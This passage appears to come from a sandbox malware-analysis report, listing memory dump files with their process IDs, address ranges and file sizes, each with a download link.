                                                    • memory/3268-4516-0x00000000005B0000-0x0000000000606000-memory.dmp

                                                      Filesize

                                                      344KB

                                                      Download

                                                    • memory/3268-1724-0x000000001BE70000-0x000000001BF77000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/3268-1725-0x000000001BE70000-0x000000001BF77000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/3268-1727-0x000000001BE70000-0x000000001BF77000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/3268-1723-0x000000001BE70000-0x000000001BF7A000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/3268-1729-0x000000001BE70000-0x000000001BF77000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/3480-1716-0x00000000023A0000-0x00000000023A8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                      Download

                                                    • memory/3480-1715-0x000000001B6B0000-0x000000001B992000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                      Download

                                                    • memory/3620-1635-0x0000000000C80000-0x000000000112C000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                      Download

                                                    • memory/3620-1636-0x0000000000C80000-0x000000000112C000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                      Download

                                                    • memory/3660-1679-0x0000000000400000-0x000000000068D000-memory.dmp

                                                      Filesize

                                                      2.6MB

                                                      Download

                                                    • memory/3840-859-0x0000000073C80000-0x0000000073D00000-memory.dmp

                                                      Filesize

                                                      512KB

                                                      Download

                                                    • memory/3840-1611-0x0000000073240000-0x0000000073820000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/3840-831-0x0000000001380000-0x000000000196C000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/3840-1576-0x0000000001100000-0x0000000001152000-memory.dmp

                                                      Filesize

                                                      328KB

                                                      Download

                                                    • memory/3840-848-0x0000000073240000-0x0000000073820000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/3840-849-0x0000000073240000-0x0000000073820000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/3840-1026-0x0000000073240000-0x0000000073820000-memory.dmp

                                                      Filesize

                                                      5.9MB

                                                      Download

                                                    • memory/3840-860-0x0000000005040000-0x00000000050AA000-memory.dmp

                                                      Filesize

                                                      424KB

                                                      Download

                                                    • memory/3840-861-0x00000000002D0000-0x00000000002E0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                      Download

                                                    • memory/3868-1644-0x0000000000F40000-0x00000000013EC000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                      Download

                                                    • memory/3868-1645-0x0000000000F40000-0x00000000013EC000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                      Download